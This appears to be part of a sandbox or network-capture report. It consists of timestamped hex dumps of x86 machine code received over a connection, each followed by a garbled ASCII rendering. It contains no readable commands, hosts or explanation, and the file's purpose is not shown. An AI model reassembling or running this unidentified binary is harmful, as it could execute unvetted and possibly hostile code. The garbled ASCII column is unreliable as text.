                                                          2023-08-02 08:16:23 UTC3197INData Raw: 6b 47 00 e8 96 2d 04 00 51 56 8b f1 89 75 f0 8d 8e 94 00 00 00 c7 45 fc 03 00 00 00 e8 f1 fa fd ff 8d 4e 7c c6 45 fc 02 e8 e5 fa fd ff 8d 4e 68 c6 45 fc 01 e8 d9 fa fd ff 80 65 fc 00 8d 4e 54 e8 cd fa fd ff 83 4d fc ff 8d 4e 04 e8 f2 aa ff ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 8b c1 83 60 04 00 83 60 08 00 c7 00 ec a7 47 00 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c c7 40 10 04 00 00 00 c7 00 78 b1 47 00 c3 b8 9c 6b 47 00 e8 0a 2d 04 00 51 56 8b f1 89 75 f0 c7 06 00 b3 47 00 83 65 fc 00 e8 91 fa fd ff 83 4d fc ff 8b ce e8 5d fa fd ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 b2 6b 47 00 e8 d2 2c 04 00 51 56 8b f1 6a 28 e8 29 ee fd ff 59 8b c8 89 4d f0 33 c0 3b c8 89 45 fc 74 08 ff 75 08 e8 e2 02 00 00 83 4d fc ff 50 8b ce e8 81 d0 fe ff 8b 4d f4 5e 64
                                                          Data Ascii: kG-QVuEN|ENhEeNTMNM^d``G3HHH@xGkG-QVuGeM]M^dkG,QVj()YM3;EtuMPM^d
                                                          2023-08-02 08:16:23 UTC3213INData Raw: 65 fc 00 e8 1e af fd ff 8b 75 08 59 eb 2a 50 51 8d 4e 0c e8 c4 8b ff ff 85 c0 74 0f 8b f0 ff 75 e4 e8 00 af fd ff 59 8b c6 eb 22 ff 75 e4 80 65 fc 00 e8 ef ae fd ff 59 43 e9 46 ff ff ff 33 c0 eb 0b b8 3a cb 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 56 8b f2 57 8b f9 8d 46 0c 8d 56 08 50 e8 3e 00 00 00 85 c0 75 37 8b 07 66 83 38 3a 74 07 b8 57 00 07 80 eb 28 6a 01 6a 00 8b cf e8 25 aa fd ff 8d 46 04 8b d6 50 8b cf e8 13 00 00 00 85 c0 75 0c 8b 47 04 f7 d8 1b c0 25 57 00 07 80 5f 5e c3 56 57 8b 7c 24 0c 8b f1 83 27 00 e8 0a 98 ff ff 85 c0 74 2a 50 6a 00 8b ce e8 e7 a9 fd ff 8b 06 66 83 38 53 75 29 6a 01 6a 00 8b ce e8 d4 a9 fd ff 8b d7 8b ce e8 e0 97 ff ff 85 c0 75 07 b8 57 00 07 80 eb 0c 50 6a 00 8b ce e8 b6 a9 fd ff 33 c0
                                                          Data Ascii: euY*PQNtuY"ueYCF3:BM_^d[VWFVP>u7f8:tW(jj%FPuG%W_^VW|$'t*Pjf8Su)jjuWPj3
                                                          2023-08-02 08:16:23 UTC3229INData Raw: 24 0c 8b f1 3b 7e 1c 7c 13 53 8d 5e 14 6a 00 8b cb e8 27 a1 00 00 3b 7e 1c 7d f2 5b 8b 4e 20 8a 44 24 10 84 c0 88 04 39 74 24 3b 7e 08 7c 0d 6a 00 6a 00 8b ce e8 73 2d ff ff eb ee 8b 46 0c 8b 4c 24 14 89 0c f8 8b 4c 24 18 89 4c f8 04 5f 5e c2 10 00 b8 48 78 47 00 e8 41 ad 03 00 83 ec 14 56 57 8b f9 8d b7 58 02 00 00 8b ce e8 ca 7a fd ff 81 c7 c8 01 00 00 8d 4d e0 57 e8 2f 3b ff ff 6a 0e 33 ff 5a 8d 4d e0 89 7d fc e8 3f 01 00 00 6a 0f 8d 4d e0 5a e8 34 01 00 00 6a 11 8b d6 8d 4d e0 e8 d7 00 00 00 6a 10 8b d6 8d 4d e0 e8 cb 00 00 00 6a 09 8b d6 8d 4d e0 e8 bf 00 00 00 6a 06 8b d6 8d 4d e0 e8 b3 00 00 00 6a 12 8b d6 8d 4d e0 e8 a7 00 00 00 6a 14 8b d6 8d 4d e0 e8 9b 00 00 00 6a 13 8b d6 8d 4d e0 e8 8f 00 00 00 6a 15 8b d6 8d 4d e0 e8 83 00 00 00 6a 0a 8b d6
                                                          Data Ascii: $;~|S^j';~}[N D$9t$;~|jjs-FL$L$L_^HxGAVWXzMW/;j3ZM}?jMZ4jMjMjMjMjMjMjMjMj
                                                          2023-08-02 08:16:23 UTC3245INData Raw: 3b c3 0f 85 3f 01 00 00 39 5e 18 74 65 8b ce e8 8f fc ff ff ff 46 28 8b f8 3b fb c6 46 39 01 75 1c 8b 4e 34 3b cb 74 15 8b 56 10 3b d3 74 0e 8b 46 48 2b 46 20 50 e8 df af fd ff 8b f8 39 5e 10 75 16 80 7e 1c 00 74 10 39 5e 34 74 0b 6a 01 8b ce e8 0f fc ff ff eb 07 8b ce e8 32 fc ff ff 3b c3 0f 85 e0 00 00 00 3b fb 74 9d 8b c7 e9 d5 00 00 00 80 66 1c 00 83 7d ec 00 0f 87 b3 00 00 00 8b 5d 10 e9 d1 fe ff ff 8b 46 0c 8b 4e 28 8b 40 08 3b c8 7d 3a 8b 46 08 8b 56 24 03 d1 33 ff 8b 48 20 8b 40 0c 8d 0c d1 8b 11 8b 49 04 8b 04 90 8b 56 48 8b 40 70 8b 04 88 8b 48 10 89 4e 3c 8b 4e 4c 8b 40 0c 3b f9 77 17 72 04 3b c2 73 07 b8 05 40 00 80 eb 71 3b f9 72 2c 77 04 3b c2 76 26 8b c8 2b 4e 48 3b 4d 0c 72 03 8b 4d 0c 01 4d ec 85 db 74 05 8b 55 ec 89 13 01 4d 08 29 4d 0c
                                                          Data Ascii: ;?9^teF(;F9uN4;tV;tFH+F P9^u~t9^4tj2;;tf}]FN(@;}:FV$3H @IVH@pHN<NL@;wr;s@q;r,w;v&+NH;MrMMtUM)M
                                                          2023-08-02 08:16:23 UTC3261INData Raw: e8 7a 03 00 00 8d 46 18 8d 8d 18 fe ff ff 50 6a 08 5b 8b d3 e8 1e 03 00 00 84 c0 0f 84 c9 01 00 00 8d 7e 1c 8b d3 57 8d 8d 20 fe ff ff e8 05 03 00 00 84 c0 75 03 83 27 00 8d 7e 20 8b d3 57 8d 8d 28 fe ff ff e8 ed 02 00 00 84 c0 75 03 83 27 00 0f b6 85 30 fe ff ff 0f b6 8d 31 fe ff ff c1 e0 08 0b c1 0f b6 8d 32 fe ff ff c1 e0 08 0b c1 0f b6 8d 33 fe ff ff c1 e0 08 0b c1 3d 00 00 00 80 8d 46 10 89 45 0c 75 6a 0f b6 85 34 fe ff ff 0f b6 8d 35 fe ff ff c1 e0 08 0b c1 0f b6 8d 36 fe ff ff c1 e0 08 0b c1 0f b6 8d 37 fe ff ff 0f b6 bd 39 fe ff ff c1 e0 08 0b c1 33 c9 8b d0 0f b6 85 38 fe ff ff c1 e0 08 0b c7 0f b6 bd 3a fe ff ff c1 e0 08 0b c7 0f b6 bd 3b fe ff ff c1 e0 08 0b c7 33 ff 0b c8 8b 45 0c 0b d7 89 08 89 50 04 eb 17 50 6a 0c 5a 8d 8d 30 fe ff ff e8 df
                                                          Data Ascii: zFPj[~W u'~ W(u'0123=FEuj4567938:;3EPPjZ0
                                                          2023-08-02 08:16:23 UTC3277INData Raw: 65 fc 00 8d 4d 80 e8 56 00 00 00 33 c0 eb 0b b8 07 cb 43 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 14 00 8b c1 33 c9 89 08 89 48 04 89 48 08 89 48 0c 89 48 10 89 48 14 89 48 18 89 48 1c 89 48 20 89 48 28 89 48 2c 89 48 30 c7 40 34 04 00 00 00 c7 40 24 30 b8 47 00 c3 b8 a7 87 47 00 e8 33 ed 02 00 51 51 56 8b f1 57 89 75 f0 83 65 fc 00 8d 7e 24 89 7d ec c7 07 30 b8 47 00 8b cf c6 45 fc 05 e8 ac ba fc ff 8b cf c6 45 fc 04 e8 78 ba fc ff 8b 46 20 c6 45 fc 03 85 c0 74 06 8b 08 50 ff 51 08 8b 46 1c c6 45 fc 02 85 c0 74 06 8b 08 50 ff 51 08 8b 46 14 c6 45 fc 01 85 c0 74 06 8b 08 50 ff 51 08 8b 46 10 80 65 fc 00 85 c0 74 06 8b 08 50 ff 51 08 8b 76 0c 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 c9 c3 e9 53
                                                          Data Ascii: eMV3CM_^d[3HHHHHHHH H(H,H0@4@$0GG3QQVWue~$}0GEExF EtPQFEtPQFEtPQFetPQvMtVPM_^dS
                                                          2023-08-02 08:16:23 UTC3293INData Raw: e8 fe fc ff ff 8a 46 40 8b cf 50 e8 c1 fc ff ff 8a 46 41 8b cf 50 e8 b6 fc ff ff 8a 06 80 7d fd 00 88 45 f8 74 08 3c 2d 73 04 c6 45 f8 2d ff 75 f8 8b cf e8 99 fc ff ff 8a 46 01 8b cf 50 e8 8e fc ff ff 66 8b 46 02 8b cf 50 e8 91 fc ff ff 66 8b 46 04 8b cf 50 e8 85 fc ff ff ff 76 08 8b cf e8 9e fc ff ff ff 76 0c 8b cf e8 94 fc ff ff 80 7d ff 00 74 05 83 c8 ff eb 03 8b 46 10 50 8b cf e8 7e fc ff ff 80 7d 0b 00 74 05 83 c8 ff eb 03 8b 46 18 53 50 8b cf e8 67 fc ff ff ff 76 24 8b cf e8 3a fc ff ff 8a 5d fe 8a 45 ff f6 db 1b db 83 e3 08 f6 d8 1b c0 83 e0 08 03 d8 8a 45 0b f6 d8 1b c0 83 e0 08 03 d8 8a 45 fd f6 d8 8d 4b 04 1b c0 23 c1 8a 8e 8a 00 00 00 f6 d9 1b c9 83 e1 24 03 c1 8d 4e 68 89 45 f8 e8 83 fe ff ff 01 45 f8 8b cf ff 75 f8 e8 e5 fb ff ff ff b6 80 00
                                                          Data Ascii: F@PFAP}Et<-sE-uFPfFPfFPvv}tFP~}tFSPgv$:]EEEK#$NhEEu
                                                          2023-08-02 08:16:23 UTC3309INData Raw: 4e 24 c7 44 24 78 ff ff ff ff e8 6b 32 ff ff 8d 4e 4c e8 63 32 ff ff 8d 4e 74 e8 5b 32 ff ff 8b 86 b4 00 00 00 85 c0 74 10 8b 10 50 ff 52 08 c7 86 b4 00 00 00 00 00 00 00 8b c7 e9 c9 00 00 00 8b 44 24 14 c6 44 24 78 00 85 c0 74 06 8b 08 50 ff 51 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8d 4e 24 e8 13 32 ff ff 8d 4e 4c e8 0b 32 ff ff 8b 46 74 33 db 3b c3 74 09 8b 10 50 ff 52 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 0c 8b 08 50 ff 51 08 89 9e b4 00 00 00 8b c7 eb 6e 8b 44 24 14 c6 44 24 78 00 3b c3 74 06 8b 10 50 ff 52 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8b 46 24 3b c3 74 09 8b 08 50 ff 51 08 89 5e 24 8b 46 4c 3b c3 74 09 8b 10 50 ff 52 08 89 5e 4c 8b 46 74 3b c3 74 09 8b 08 50 ff 51 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 a3 8b 10 50 ff 52 08 89 9e b4 00 00
                                                          Data Ascii: N$D$xk2NLc2Nt[2tPRD$D$xtPQt$D$xN$2NL2Ft3;tPR^t;tPQnD$D$x;tPRt$D$xF$;tPQ^$FL;tPR^LFt;tPQ^t;tPR
                                                          2023-08-02 08:16:23 UTC3325INData Raw: 9c 70 02 00 00 8b 2a 83 c2 04 03 cd 46 3b c8 72 f4 8d 6e ff 3b eb 7e 20 3b 7c 24 18 74 1a 83 ff 01 74 15 8b 54 24 10 83 e2 01 80 fa 01 75 09 8b f5 2b 8c b4 70 02 00 00 8b 6c 24 24 33 c0 3b c3 7c 08 3b c6 7d 04 33 d2 eb 05 ba 01 00 00 00 88 14 28 8b 54 24 38 40 3b c2 7c e3 8b 44 24 1c 8b de 8b 74 24 10 2b c1 4f 46 81 ed 02 01 00 00 89 44 24 1c 85 ff 89 74 24 10 89 6c 24 24 0f 85 6f ff ff ff 8b 6c 24 54 c7 44 24 28 04 00 00 00 8b 5c 24 18 33 d2 8d b5 20 06 00 00 33 c0 8b fe 42 b9 02 01 00 00 81 c6 08 04 00 00 3b d3 f3 ab 7c ea 33 c9 8d 85 80 36 00 00 89 4c 24 34 89 44 24 1c 8b 54 24 3c 33 ff 8d 74 24 70 33 c0 8a 04 11 41 3d ff 00 00 00 72 08 33 db 8a 1c 11 03 c3 41 89 06 47 83 c6 04 83 ff 32 7d 06 3b 4c 24 20 72 da 89 4c 24 30 c7 44 24 24 ff ff ff ff c7 44
                                                          Data Ascii: p*F;rn;~ ;|$ttT$u+pl$$3;|;}3(T$8@;|D$t$+OFD$t$l$$ol$TD$(\$3 3B;|36L$4D$T$<3t$p3A=r3AG2};L$ rL$0D$$D
                                                          2023-08-02 08:16:23 UTC3341INData Raw: 8b c2 89 56 04 3b c1 75 07 8b ce e8 bb 24 fc ff 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 e9 78 02 00 00 25 ff ff 00 00 33 d2 33 c9 89 44 24 14 8a 90 f0 13 49 00 8d b5 70 04 00 00 89 54 24 1c 8a 8c 2a 3d 08 00 00 8b 9c 95 80 11 00 00 8b f9 85 ff 76 7d 8b 46 28 3b f8 72 4b b9 08 00 00 00 2b f8 2b c8 8a c3 8b 2e d2 e0 8a 4e 2c 0a c1 8b 4e 04 88 04 29 8b 6e 04 8b 4e 08 45 8b c5 89 6e 04 3b c1 75 0b 8b ce e8 39 24 fc ff 8b 54 24 1c 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 eb 23 8b 6e 28 b0 01 8b cf d2 e0 b9 08 00 00 00 2b cd fe c8 22 c3 d2 e0 8a 4e 2c 0a c8 2b ef 88 4e 2c 89 6e 28 8b 44 24 14 8b 6c 24 10 8b 8d e0 04 00 00 33 db 8a 1c 11 8b 8d dc 04 00 00 8b fb 33 db 8a 1c 11 2b c3 85 ff 8b d8 76 71 8b 46 28 3b f8 72 47 b9
                                                          Data Ascii: V;u$N(F(F,wx%33D$IpT$*=v}F(;rK++.N,N)nNEn;u9$T$N(F(F,w#n(+"N,+N,n(D$l$33+vqF(;rG
                                                          2023-08-02 08:16:23 UTC3357INData Raw: 00 00 00 00 5e c3 90 90 90 90 90 90 90 90 56 8b 74 24 08 8d 4e 30 e8 94 e4 fb ff 85 c0 75 0b 8b 8e ac 1c 00 00 e8 c4 fc ff ff 5e c2 04 00 51 8b 41 2c 56 8d 71 08 8b 54 24 0c b9 0f 00 00 00 57 8b 7e 20 2b c8 d3 ef b9 11 00 00 00 03 c2 2b ca 89 46 24 81 e7 ff ff 01 00 d3 ef 83 f8 10 72 72 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 0e d5 fb ff 88 44 24 08 eb 09 8a 08 40 88 4c 24 08 89 06 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 ef d4 fb ff 88 44 24 10 eb 09 8a 10 40 88 54 24 10 89 06 8b 46 20 8b 4c 24 10 8b 54 24 08 81 e1 ff 00 00 00 c1 e0 08 0b c1 8b 4e 24 c1 e0 08 81 e2 ff 00 00 00 83 c1 f0 0b c2 89 4e 24 89 46 20 8b c1 83 f8 10 73 8e 8b c7 5f 5e 59 c2 04 00 90 90 90 90 81 ec b4 00 00 00 53 55 56 33 db 57 8b e9 33 f6 6a 04 8b cd e8 37 ff ff ff 88 44 34 28 46 83 fe 14
                                                          Data Ascii: ^Vt$N0u^QA,VqT$W~ ++F$rrN;rD$@L$N;rD$@T$F L$T$N$N$F s_^YSUV3W3j7D4(F
                                                          2023-08-02 08:16:23 UTC3373INData Raw: 90 b1 47 00 c7 41 04 80 b1 47 00 e9 ae ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 6a ff 68 9e 9b 47 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 94 00 00 00 53 55 8b e9 56 57 8d 4c 24 1c e8 48 94 fb ff 33 ff 89 bc 24 ac 00 00 00 89 7c 24 40 89 7c 24 44 89 7c 24 54 89 7c 24 60 68 00 00 10 00 8d 4c 24 20 c6 84 24 b0 00 00 00 01 e8 2c 94 fb ff 84 c0 75 62 8d 4c 24 40 c6 84 24 ac 00 00 00 02 e8 34 a3 fb ff 8b 44 24 54 c6 84 24 ac 00 00 00 00 3b c7 74 06 8b 08 50 ff 51 08 8d 4c 24 1c c7 84 24 ac 00 00 00 03 00 00 00 e8 2b 94 fb ff 8b 44 24 28 c7 84 24 ac 00 00 00 ff ff ff ff 3b c7 0f 84 90 00 00 00 8b 10 50 ff 52 08 b8 0e 00 07 80 e9 26 06 00 00 8b 84 24 b4 00 00 00 8d 4c 24 1c 50 e8 04 94 fb ff 8d 4c 24 1c e8 0a 94 fb ff 68 00 00 10 00 8d 4c 24
                                                          Data Ascii: GAGjhGdPd%SUVWL$H3$|$@|$D|$T|$`hL$ $,ubL$@$4D$T$;tPQL$$+D$($;PR&$L$PL$hL$
                                                          2023-08-02 08:16:23 UTC3389INData Raw: ff ff 5f 5e 5b 83 f9 03 76 11 8b 54 24 18 33 c0 89 02 8b c5 5d 83 c4 0c c2 0c 00 8b 54 24 18 49 d3 e0 83 e0 07 89 02 8b c5 5d 83 c4 0c c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 2c 83 fa 10 73 08 33 c0 83 c4 2c c2 08 00 8b 44 24 30 53 55 83 ea 10 56 2b c1 57 89 54 24 28 c7 44 24 10 00 00 00 00 8b f9 89 44 24 24 90 0f b6 07 83 e0 1f 0f b6 88 bc c5 47 00 b8 05 00 00 00 33 f6 89 4c 24 20 89 44 24 1c 89 74 24 18 8b 54 24 20 8b ce d3 ea f6 c2 01 0f 84 84 01 00 00 8b f0 8b c8 c1 ee 03 0f b6 44 37 05 99 0f a4 c2 08 c1 e0 08 8b d8 0f b6 44 37 04 8b ea 99 83 e1 07 03 d8 0f b6 44 37 03 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 02 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 01 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 04 37 13 ea 0f a4 dd 08
                                                          Data Ascii: _^[vT$3]T$I],s3,D$0SUV+WT$(D$D$$G3L$ D$t$T$ D7D7D7D7D77
                                                          2023-08-02 08:16:23 UTC3405INData Raw: 75 08 8b d1 c7 02 02 00 00 00 83 7e 78 08 0f 85 da fd ff ff e9 5f fd ff ff bd 01 00 00 00 e9 61 fd ff ff 8b 44 24 48 c7 00 02 00 00 00 e9 50 fd ff ff 8b 4c 24 48 c7 01 03 00 00 00 e9 41 fd ff ff 8b 54 24 48 c7 02 03 00 00 00 e9 32 fd ff ff 8b e8 e9 2d fd ff ff 5f 5e 8b c5 5d 5b 83 c4 24 c2 14 00 5f 5e 5d 33 c0 5b 83 c4 24 c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 8b 4c 24 10 8b 01 53 33 db 39 5f 18 55 8b 6c 24 14 0f 95 c3 89 44 24 0c c7 44 24 14 00 00 20 00 c7 01 00 00 00 00 83 c3 05 3b c3 73 0d 5d b8 07 00 00 00 5b 83 c4 08 c2 0c 00 8b 0f 2b c3 89 44 24 08 e8 a6 25 00 00 8b 57 14 8d 44 24 14 50 68 00 00 01 00 8d 4c 24 10 51 8b 0f 03 dd 53 e8 6a 62 00 00 8b 54 24 14 85 d2 0f 84 9f 01 00 00 56 85 c0 75 2c 8b 74 24 0c 8d 46 02 3b c2 73
                                                          Data Ascii: u~x_aD$HPL$HAT$H2-_^][$_^]3[$L$S39_Ul$D$D$ ;s][+D$%WD$PhL$QSjbT$Vu,t$F;s
                                                          2023-08-02 08:16:24 UTC3421INData Raw: 0f b6 8c 24 80 00 00 00 57 8d bd a0 0e 03 00 e8 da f0 ff ff eb 50 0f b6 84 24 80 00 00 00 c7 44 24 34 00 00 00 00 0d 00 01 00 00 8d 49 00 8b c8 c1 e9 08 0f b7 14 4f 8b c8 c1 e9 07 83 e1 01 f7 d9 c1 f9 04 83 e1 7f c1 ea 04 33 d1 8b 4c 24 34 03 8c 95 a0 0e 03 00 03 c0 89 4c 24 34 3d 00 00 01 00 72 ca 8b c1 8b 54 24 2c 03 d0 89 54 24 2c 3b 93 d0 06 00 00 73 2c 89 93 d0 06 00 00 8b 54 24 14 89 93 e8 06 00 00 c7 83 ec 06 00 00 ff ff ff ff c7 83 d8 06 00 00 00 00 00 00 c7 44 24 28 01 00 00 00 8b 4c 24 40 0f b7 84 4d b0 25 03 00 0f b7 94 75 30 27 03 00 35 f0 07 00 00 c1 e8 04 8b 84 85 a0 0e 03 00 03 44 24 24 81 f2 f0 07 00 00 c1 ea 04 8b bc 95 a0 0e 03 00 8b 54 24 14 03 f8 89 44 24 58 8a 84 24 80 00 00 00 89 7c 24 48 38 44 24 13 75 61 39 93 e8 06 00 00 73 09 83
                                                          Data Ascii: $WP$D$4IO3L$4L$4=rT$,T$,;s,T$D$(L$@M%u0'5D$$T$D$X$|$H8D$ua9s
                                                          2023-08-02 08:16:24 UTC3437INData Raw: 24 14 8a 48 02 80 f9 07 73 14 fe 48 03 75 0f 66 d1 20 b2 03 d2 e2 fe c1 88 48 02 88 50 03 89 7e 08 8a 1f 8b ce e8 14 fb ff ff 5f 5e 5d 0f b6 c3 5b 81 c4 0c 05 00 00 c3 5f 5e 5d b8 fe ff ff ff 5b 81 c4 0c 05 00 00 c3 cc cc cc cc cc cc 33 c0 89 01 89 41 04 c7 41 08 ff ff ff ff 88 41 0c c7 41 10 01 00 00 00 89 41 14 c3 cc cc cc cc 8b 46 08 33 d2 f7 74 24 0c 53 bb 00 00 00 00 8b c8 0f af 4c 24 08 01 0e 11 5e 04 0f af 44 24 0c 89 46 08 3d 00 00 00 01 73 78 55 57 83 cd ff 90 8b 3e c1 66 08 08 81 ff 00 00 00 ff 72 10 8b 56 04 8b c7 b1 20 e8 36 67 00 00 85 c0 74 3a 8a 5e 0c 8b 06 8b 56 04 8b 7e 18 b1 20 e8 20 67 00 00 8b ca 8d 14 03 8b 07 8b cf ff d0 80 cb ff 01 6e 10 8b 46 10 11 6e 14 0b 46 14 75 d5 8b 3e 8b cf c1 e9 18 88 4e 0c 33 db 83 46 10 01 89 5e 04 11 5e
                                                          Data Ascii: $HsHuf HP~_^][_^][3AAAAAF3t$SL$^D$F=sxUW>frV 6gt:^V~ gnFnFu>N3F^^
                                                          2023-08-02 08:16:24 UTC3453INData Raw: 89 51 58 89 41 5c 89 41 60 89 81 a8 00 00 00 89 81 bc 00 00 00 89 81 d0 00 00 00 89 81 e4 00 00 00 89 01 89 41 04 89 41 48 89 41 4c c3 cc 83 c1 58 e9 98 f9 ff ff cc cc cc cc cc cc cc cc 83 ec 58 8b 44 24 5c 53 8b 5c 24 68 55 8b 6c 24 68 56 57 89 54 24 10 8b 13 8b f9 8b 08 c7 00 00 00 00 00 8b 44 24 7c c7 03 00 00 00 00 89 4c 24 1c 89 54 24 18 c7 00 00 00 00 00 eb 03 8d 49 00 8b 0b 8b 74 24 18 8b 07 2b f1 89 74 24 74 83 f8 06 0f 85 17 01 00 00 8b 44 24 1c 8b 4c 24 6c 2b 01 89 74 24 70 89 44 24 74 85 f6 75 08 85 c0 0f 84 91 05 00 00 8b 54 24 7c 8b 44 24 78 52 50 6a 00 8d 4c 24 7c 51 55 8d 94 24 88 00 00 00 52 8b 54 24 28 8d 4f 58 e8 d5 f9 ff ff 8b 74 24 74 8b 54 24 10 56 8d 8f 90 01 00 00 89 44 24 18 e8 ad f1 ff ff 8b 44 24 70 01 03 8b 4c 24 6c 03 e8 01 47
                                                          Data Ascii: QXA\A`AAHALXXD$\S\$hUl$hVWT$D$|L$T$It$+t$tD$L$l+t$pD$tuT$|D$xRPjL$|QU$RT$(OXt$tT$VD$D$pL$lG
                                                          2023-08-02 08:16:24 UTC3469INData Raw: 0f 83 e6 f0 eb 03 6a 10 5e 89 75 0c 89 7d dc 83 fe e0 0f 87 f3 00 00 00 6a 09 e8 59 1a 00 00 59 c7 45 fc 01 00 00 00 8d 45 d4 50 8d 45 c8 50 53 e8 3f 2d 00 00 83 c4 0c 8b f8 89 7d d0 85 ff 0f 84 aa 00 00 00 3b 35 5c 01 49 00 73 5c 8b de c1 eb 04 53 57 ff 75 d4 ff 75 c8 e8 dd 30 00 00 83 c4 10 85 c0 74 08 8b 45 08 89 45 dc eb 38 53 e8 9c 2d 00 00 59 89 45 dc 85 c0 74 2a 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 ff 75 08 ff 75 dc e8 37 fa ff ff 57 ff 75 d4 ff 75 c8 e8 28 2d 00 00 83 c4 18 8b 5d 08 83 7d dc 00 75 53 56 6a 00 ff 35 80 65 49 00 ff 15 8c a1 47 00 89 45 dc 85 c0 74 3d 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 53 ff 75 dc e8 f0 f9 ff ff 57 ff 75 d4 ff 75 c8 e8 e1 2c 00 00 83 c4 18 eb 13 56 53 6a 00 ff 35 80 65 49 00 ff 15 94 a1 47 00
                                                          Data Ascii: j^u}jYYEEPEPS?-};5\Is\SWuu0tEE8S-YEt*E;rPuu7Wuu(-]}uSVj5eIGEt=E;rPSuWuu,VSj5eIG
                                                          2023-08-02 08:16:24 UTC3485INData Raw: d5 8b f0 3b f3 74 0c c7 05 40 38 49 00 01 00 00 00 eb 28 ff 15 f0 a1 47 00 8b f8 3b fb 0f 84 ea 00 00 00 c7 05 40 38 49 00 02 00 00 00 e9 8f 00 00 00 83 f8 01 0f 85 81 00 00 00 3b f3 75 0c ff d5 8b f0 3b f3 0f 84 c2 00 00 00 66 39 1e 8b c6 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 2b c6 8b 3d 44 a0 47 00 d1 f8 53 53 40 53 53 50 56 53 53 89 44 24 34 ff d7 8b e8 3b eb 74 32 55 e8 4e b4 ff ff 3b c3 59 89 44 24 10 74 23 53 53 55 50 ff 74 24 24 56 53 53 ff d7 85 c0 75 0e ff 74 24 10 e8 65 b5 ff ff 59 89 5c 24 10 8b 5c 24 10 56 ff 15 ec a1 47 00 8b c3 eb 53 83 f8 02 75 4c 3b fb 75 0c ff 15 f0 a1 47 00 8b f8 3b fb 74 3c 38 1f 8b c7 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c7 40 8b e8 55 e8 e7 b3 ff ff 8b f0 59 3b f3 75 04 33 f6 eb 0b 55 57 56 e8 cf b9 ff ff
                                                          Data Ascii: ;t@8I(G;@8I;u;f9t@@f9u@@f9u+=DGSS@SSPVSSD$4;t2UN;YD$t#SSUPt$$VSSut$eY\$\$VGSuL;uG;t<8t@8u@8u+@UY;u3UWV
                                                          2023-08-02 08:16:24 UTC3501INData Raw: f8 ff 8d 4d cc e9 91 cd f8 ff 8d 4d d8 e9 89 cd f8 ff 8d 4d c0 e9 81 cd f8 ff 8d 4d d8 e9 79 cd f8 ff 8d 4d c0 e9 71 cd f8 ff 8d 4d 94 e9 e7 39 fb ff 8d 4d 94 e9 df 39 fb ff 8d 4d bc e9 32 d9 f8 ff 8d 4d 94 e9 cf 39 fb ff b8 28 01 48 00 e9 02 6a ff ff cc cc 8d 4d e8 e9 3d cd f8 ff 8d 4d d0 e9 35 cd f8 ff 8d 4d dc e9 2d cd f8 ff b8 a8 01 48 00 e9 de 69 ff ff cc cc 8d 4d e0 e9 19 cd f8 ff b8 e0 01 48 00 e9 ca 69 ff ff cc cc 8d 4d e8 e9 05 cd f8 ff b8 08 02 48 00 e9 b6 69 ff ff cc cc 8d 4d e8 e9 f1 cc f8 ff b8 30 02 48 00 e9 a2 69 ff ff cc cc 8d 4d e0 e9 dd cc f8 ff b8 58 02 48 00 e9 8e 69 ff ff cc cc 8d 4d e0 e9 c9 cc f8 ff b8 80 02 48 00 e9 7a 69 ff ff cc cc 8d 4d e4 e9 b5 cc f8 ff 8d 4d cc e9 ad cc f8 ff 8d 4d d8 e9 a5 cc f8 ff b8 a8 02 48 00 e9 56 69 ff
                                                          Data Ascii: MMMMyMqM9M9M2M9(HjM=M5M-HiMHiMHiM0HiMXHiMHziMMMHVi
                                                          2023-08-02 08:16:24 UTC3517INData Raw: e9 96 8d f8 ff 8d 8d 34 ff ff ff e9 8b 8d f8 ff 8d 8d 1c ff ff ff e9 80 8d f8 ff 8d 8d 04 ff ff ff e9 75 8d f8 ff 8d 8d ec fe ff ff e9 6a 8d f8 ff b8 c8 66 48 00 e9 1b 2a ff ff cc cc cc 8b 4d f0 e9 d3 f9 fa ff b8 90 67 48 00 e9 06 2a ff ff cc cc ff 75 f0 e8 cc ee f8 ff 59 c3 b8 b8 67 48 00 e9 f0 29 ff ff 8d 4d d4 e9 f7 61 fc ff b8 e0 67 48 00 e9 de 29 ff ff cc cc b8 08 68 48 00 e9 d2 29 ff ff cc cc 8d 4d e0 e9 73 45 fc ff b8 98 68 48 00 e9 be 29 ff ff cc cc 8d 8d 58 ff ff ff e9 58 40 fc ff b8 c0 68 48 00 e9 a7 29 ff ff cc cc cc b8 20 69 48 00 e9 9a 29 ff ff cc cc 8d 4d d0 e9 9f 61 fc ff b8 78 69 48 00 e9 86 29 ff ff cc cc 8d 8d 58 ff ff ff e9 20 40 fc ff b8 a0 69 48 00 e9 6f 29 ff ff cc cc cc 8d 8d c4 fe ff ff e9 08 40 fc ff 8d 8d 5c ff ff ff e9 fd 3f fc
                                                          Data Ascii: 4ujfH*MgH*uYgH)MagH)hH)MsEhH)XX@hH) iH)MaxiH)X @iHo)@\?
